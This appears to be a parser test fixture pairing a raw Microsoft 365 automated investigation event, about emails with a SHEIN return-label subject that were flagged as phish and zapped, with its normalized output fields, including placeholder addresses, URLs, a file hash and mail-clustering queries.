\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:a17bc80a136cbf4f5d4e82f43a9a3d1d\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"24b8430c-484d-4ee0-e12b-08dcee99416a\\\",\\\"2e99f39a-c998-4d94-2085-08dce9cd0b7d\\\",\\\"0ac4ee3c-7c79-408e-76c2-08dcf4106b65\\\",\\\"fd400540-8a8d-42ae-d1f9-08dced20c42f\\\",\\\"31cfca73-f309-4e21-cbc4-08dceed074cf\\\",\\\"0491b33a-15fc-4503-9dd1-08dced818f57\\\",\\\"4b620244-917b-4a04-7416-08dcf50af378\\\",\\\"1abed68d-3b03-46bd-45e2-08dcf43fb625\\\",\\\"abb4c4a5-7049-4047-5a68-08dcec201c1f\\\",\\\"92bba720-15bc-4f09-49f2-08dcf8d738a4\\\",\\\"3d511617-b717-416c-89cf-08dcf90a51c7\\\",\\\"c3ad4b6b-0fd9-4510-4481-08dcf9043502\\\",\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"a1d9684c-9982-4f80-880c-08dcf775c1a9\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":5,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0,\\\"MaliciousUrl\\\":15},\\\"CountByProtectionStatus\\\":{\\\"Delivered\\\":10,\\\"Blocked\\\":4,\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Inbox\\\":10,\\\"Quarantine\\\":4,\\\"DeletedFolder\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\\\\\") 
AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"MailCount\\\":15,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:54 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:cae0ce4483385c4ff176b00a0cd18f8e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:56\\\"}],\\\"RelatedAlertIds\\\":[\\\"fff21c13-c681-7398-1200-08dcf8958252\\\"],\\\"StartTimeUtc\\\":\\\"2024-10-31T13:33:19\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"TimestampUtc\\\":\\\"2024-10-31T13:33:19\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"MachineName\\\":\\\"MachineNameTest\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"\n ],\n 
\"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"TestProvider\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-10-30T03:47:24Z\\\",\\\"EndTimeUtc\\\":\\\"2024-10-30T03:47:24Z\\\",\\\"TimeGenerated\\\":\\\"2024-10-30T03:52:49.16Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"UrlReputation\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"fff21c13-c681-7398-1200-08dcf8958252\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"bb0ac18c-5081-41e0-8656-f256ba9298d0\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"InvestigationStatus\\\":\\\"Running\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\"],\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed 
-V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fafff21c13-c681-7398-1200-08dcf8958252\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Url\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":2,\\\"Urn\\\":\\\"urn:UrlEntity:289101bb3aa22cd0464dcd3ffa7116a8\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"4\\\",\\\"Files\\\":[{\\\"$id\\\":\\\"5\\\",\\\"Name\\\":\\\"returnLabel_314378736750.pdf\\\",\\\"FileHashes\\\":[{\\\"$id\\\":\\\"6\\\",\\\"Algorithm\\\":\\\"SHA256\\\",\\\"Value\\\":\\\"F9F5D882A83CAF93B3DBEACED8FCFCCD123ABDCD141A1B5423A74E387BA74D5D\\\",\\\"Type\\\":\\\"filehash\\\"}],\\\"Type\\\":\\\"file\\\",\\\"MalwareFamily\\\":null}],\\\"Recipient\\\":\\\"test.to@ixina.com\\\",\\\"Urls\\\":[\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2BkzPoBjfVNj9CJCtsLW0zwNgmTcKgWQoyoJpwVuYlpQciOV7VFY4y40pT7PbFjZu-2BT61qNz-2FjLIbrl5IqV-2F6VA-3Dowc9_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oKxDmfijZNNeoMjhZ1voAZ4rYtu5m9xdiEh8pCCrwyFrXAffKU6vpGqbxQY4O5g0v8B7yN8HEfrFjo7Fn7G-2FQVkuoVw1L-2FcSqVGgGsGEOY4-2BG2cvJmEd1era-2FAnl53IvDmt-2FjEc5wDjePqx-2Ff9ahD7\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2B7I3RFKjR2LTj-2FCdqvCgUA-3De-zv_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6otxpVGSalyLT-2BMyMS7yEfvbLbY9v9Wjn3hkHG29S-2FBOFjoVX-2FSwv2kZeymJW-2FlgRvHCB20rH0kwYqIdOsdO-2FvuCq-2BU49-2FNEo4S2gaZRd0h3zn5MFhXxj-
2F-2FbW3X5gOaGP7-2FpGN-2BX-2BHRi1Xt1JzFgCpA\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz49R6-2B-2FASLo-2BUtlyP-2F4iSjQlm-2F4HWFki90oq-2Bc29Sr-2BJAxlu_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6qR2GRWjTyLjKHBwmcXgTV-2BMq0R5qnuDMHYAbrFxAmtHiepp1aU8L-2FOCt-2BiboZksoqBfuo-2FcqBrfi9un8ILJByRUOZM3T6alRzsB1jmdLOKOZwr3m8kymuz3dFvNya6aYPmSZG4l57ycCGBya5xMMqf\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz1dNl4cyoCqQhbWGcqggHJW8SDLFVls-2FdSGWRn2n26uXgiSb-2FLZ3Oc-2F6taFyBHXTJv-2BdvE0YkDtEsaWUVnnpz7Lus9fp2MjvsYOqibyuC9Sjzgm4flo2XfvY4y5mBWuQF-2F7nM55pZ5S6S-2BSuNa5j-2BID5HJzdZOlXc2nyvbxmDFrTDuau_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oCyme2zPY6GKJBwI7FWZYrXhePHLdzV5WL-2F5EJubwqlYflj1CI9yL7Xfb24ks7WDE2wa8hQ-2BQ3h8K7-2FNpWkzEtiEQPiPEF3zOMzaOlqjkbPLg0UzpEmObjky1BycKoXMMwtfEuHLB9VnhNmDV3aIW2\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xzwS57HzRFV06M2bzMBaRY-2BtdD2HhGOqR6HD9j7eU3woqib3lW0qFsRIYtEfnDRINtIJErjGpQG2ad3jjAbAIacwJ4Le0eScR4TY1ExyusbvGQU5p_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6psejQMn2EzritsHjoZX3rBM6GN1Gt7OeDjl2fzK-2BAK5-2FzHIjoTmyFKIkBvxn4mrKqstgF5tkhF6rc-2BIL2TqH7FTpqHdxk6lMOLfZVS4DrhiP-2FvyHZwSo2RzY-2BDmTRvcBEOqOwutpZKgr0m7fArTF-2Fv\\\",\\\"http://shein.ltwebstatic.com/advertise/shein/www/images_sheIn/SheIn_logo1_1.png\\\",\\\"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_09_2.jpg\\\",\\\"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_11_1.jpg\\\",\\\"https://play.google.com/store/apps/details?id=com.
zzkko&hl=en\\\",\\\"https://fr.shein.com/\\\",\\\"https://fr.shein.com/robot\\\",\\\"https://fr.shein.com/user/order_return/order_return_label/GSONEQ62U001GKT?country=France&refund_bill_id=&return_order_id=NE91E0E8C1\\\",\\\"https://itunes.apple.com/us/app/yub-streetwear-fashion-shopping/id878577184?mt=8\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"HighConfPhish\\\"],\\\"Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P1Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P1SenderDomain\\\":\\\"gmail.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P2SenderDisplayName\\\":\\\"Fanny Barriol\\\",\\\"P2SenderDomain\\\":\\\"gmail.com\\\",\\\"ReceivedDate\\\":\\\"2024-10-29T21:12:56\\\",\\\"NetworkMessageId\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"InternetMessageId\\\":\\\"\\\",\\\"Subject\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"Blocked\\\",\\\"ThreatDetectionMethods\\\":[\\\"UrlReputation\\\"],\\\"Language\\\":\\\"fr\\\",\\\"DeliveryLocation\\\":\\\"Quarantine\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"PhishConfidenceLevel\\\":\\\"High\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved to quarantine]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"Comp 
Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:79be71f3203d9db81f0076352eca662e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"7\\\",\\\"MailboxPrimaryAddress\\\":\\\"test.to@ixina.com\\\",\\\"Upn\\\":\\\"test.to@ixina.com\\\",\\\"AadId\\\":\\\"2011d28b-3a87-4359-b2a0-7d14f0a83828\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:f182c190672d0194477f316c5f0367e5\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (BodyFingerprintBin1:\\\\\\\"2929356879\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"BodyFingerprintBin1,SenderIp\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"BodyFingerprintBin1;SenderIp;ContentType\\\",\\\"ClusterByValue\\\":\\\"2929356879;1.2.3.4;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 
PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:0b159e7db54d59b4165e81fb02f6c656\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"9\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"gmail.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN;gmail.com;1;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 
PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:5e820543f7cce922d13fcc25a0ca2204\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"10\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN;1.2.3.4;1;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a42bb73f2f36d917364f11fe67f0c39b\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"11\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( 
(BodyFingerprintBin1:\\\\\\\"2929356879\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"gmail.com\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"BodyFingerprintBin1,P2SenderDomain\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"BodyFingerprintBin1;P2SenderDomain;ContentType\\\",\\\"ClusterByValue\\\":\\\"2929356879;gmail.com;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a5f65badbcbc2e3c6409625436363a29\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"12\\\",\\\"NetworkMessageIds\\\":[\\\"24b8430c-484d-4ee0-e12b-08dcee99416a\\\",\\\"2e99f39a-c998-4d94-2085-08dce9cd0b7d\\\",\\\"0ac4ee3c-7c79-408e-76c2-08dcf4106b65\\\",\\\"fd400540-8a8d-42ae-d1f9-08dced20c42f\\\",\\\"31cfca73-f309-4e21-cbc4-08dceed074cf\\\",\\\"0491b33a-15fc-4503-9dd1-08dced818f57\\\",\\\"4b620244-917b-4a04-7416-08dcf50af378\\\",\\\"1abed68d-3b03-46bd-45e2-08dcf43fb625\\\",\\\"abb4c4a5-7049-4047-5a68-08dcec201c1f\\\",\\\"92bba720-15bc-4f09-49f2-08dcf8d738a4\\\",\\\"3d511617-b717-416c-89cf-08dcf90a51c7\\\",\\\"c3ad4b6b-0fd9-4510-4481-08dcf9043502\\\",\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"a1d9684c-9982-4f80-880c-08dcf775c1a9\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":5,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0,\\\"MaliciousUrl\\\":15},\\\"CountByProtectionStatus\\\":{\\\"Delivered\\\":10,\\\"Blocked\\\":4,\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliv
eryLocation\\\":{\\\"Inbox\\\":10,\\\"Quarantine\\\":4,\\\"DeletedFolder\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"MailCount\\\":15,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:54 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:cae0ce4483385c4ff176b00a0cd18f8e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:56\\\"}],\\\"LogCreationTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"MachineName\\\":\\\"MachineNameTest\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\n \"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n \"EndTimeUtc\":\"2024-10-31T15:26:49\",\n \"InvestigationId\":\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n \"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n \"InvestigationType\":\"ZappedUrlInvestigation\",\n \"LastUpdateTimeUtc\":\"2024-10-31T12:59:19\",\n \"RunningTime\":9022,\n 
\"StartTimeUtc\":\"2024-10-31T12:58:22\",\n \"Status\":\"Pending Action\"\n }", + "event": { + "action": "AirInvestigationData", + "code": "64", + "end": "2024-10-31T15:26:49Z", + "kind": "event", + "outcome": "success", + "start": "2024-10-31T12:58:22Z" + }, + "@timestamp": "2024-10-31T16:24:41Z", + "action": { + "id": 64, + "name": "AirInvestigationData", + "outcome": "success", + "target": "user" + }, + "email": { + "attachments": [ + { + "file": { + "hash": { + "sha256": "F9F5D882A83CAF93B3DBEACED8FCFCCD123ABDCD141A1B5423A74E387BA74D5D" + }, + "name": "returnLabel_314378736750.pdf" + } + } + ], + "from": { + "address": [ + "test.sender@gmail.com" + ] + }, + "to": { + "address": [ + "test.to@ixina.com" + ] + } + }, + "host": { + "name": "MachineNameTest" + }, + "log": { + "level": "Informational" + }, + "office365": { + "audit": { + "object_id": "c3ebef20-fb63-4d14-b3c1-7bfb5937903a" + }, + "investigation": { + "alert": { + "category": "ThreatManagement", + "correlation_key": "bb0ac18c-5081-41e0-8656-f256ba9298d0", + "is_incident": false, + "provider": { + "name": "TestProvider", + "status": "InProgress" + }, + "severity": "Informational", + "source_type": "System", + "type": "8e6ba277-ef39-404e-aaf1-294f6d9a2b88" + }, + "delivery": { + "action": [ + "Blocked" + ] + }, + "email": { + "sender": { + "domains": [ + "gmail.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "subjects": [ + "Fwd: Votre \u00e9tiquette de retour de SHEIN" + ], + "urls": [ + "http://shein.ltwebstatic.com/advertise/shein/www/images_sheIn/SheIn_logo1_1.png", + "https://fr.shein.com/", + "https://fr.shein.com/robot", + "https://fr.shein.com/user/order_return/order_return_label/GSONEQ62U001GKT?country=France&refund_bill_id=&return_order_id=NE91E0E8C1", + "https://itunes.apple.com/us/app/yub-streetwear-fashion-shopping/id878577184?mt=8", + "https://play.google.com/store/apps/details?id=com.zzkko&hl=en", + "https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_09_2.jpg", + 
